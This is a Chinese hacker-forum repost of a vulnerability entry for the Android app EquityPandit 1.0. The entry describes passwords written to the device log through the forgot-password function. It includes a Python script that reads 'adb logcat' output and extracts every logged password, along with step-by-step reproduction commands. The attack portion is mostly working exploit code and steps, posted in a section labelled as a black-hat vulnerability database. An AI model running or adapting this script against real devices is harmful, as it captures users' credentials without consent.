跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

EquityPandit 1.0 - Password Disclosure

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:

   - Sometimes developers keeps sensitive data logged into the developer
   console. Thus, attacker easy to capture sensitive information like password.
   - In this application, with adb, attacker can capture password of any
   users via forgot password function.

#Requirement:

   - Santoku virtual machine
   - Android virtual machine (installed "EquityPandit" apk file)
   - Victim user/password: [email protected]/123456
   - Exploit code named capture.py in Santoku vm as below:

import subprocess
import re

process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
	print '\t#%i: %s' %(int(index)+1, item)

#Reproduce:

   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)

adb connect x.x.x.x


   - Step 2: From Android machine, open EquityPandit, click forgot password
   function for acccount "[email protected]" and then click submit
   - Step 3: From Santoku, execute capture.py
   - Actual: Password of "[email protected]" will be show in terminal as
   "123456"

#Demo:

https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。